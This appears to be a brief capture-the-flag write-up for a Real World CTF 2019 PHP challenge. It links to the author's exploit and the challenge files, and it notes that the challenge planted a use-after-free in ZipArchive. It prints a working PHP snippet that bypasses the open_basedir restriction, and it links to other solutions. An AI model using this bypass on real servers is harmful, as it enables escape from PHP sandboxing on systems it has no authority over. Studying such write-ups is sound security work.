You can find my exploit here.
https://gist.github.com/wupco/29f16a4936a599a243ea3c0f9c414e71
You can get attachment here.
https://github.com/chaitin/Real-World-CTF-2019-Quals-Attachment/tree/master/184c379a6f90b9e3fcbbdf3f57d8a388
Addition Intro
- An old path to bypass openbasedir.
function bypass_open_basedir(){
if(!is_dir('/tmp/ab')){
mkdir('/tmp/ab');
}
chdir('/tmp/ab');
ini_set('open_basedir','..');
chdir('..');
chdir('..');
chdir('..');
chdir('..');
ini_set('open_basedir','/');
}
- Detect use-after-free in ZipArchive
I've deleted a line of zip.c. (without assign zero after efree
)
- exploit it.
Other awesome solutions
- libcurl heap overflow
https://blog.bushwhackers.ru/pwning-master-of-php-like-its-real-real-world-ctf/
- UAF on spl_dllist
https://github.com/junorouse/ctf/tree/master/2019/realworld/mop
发表评论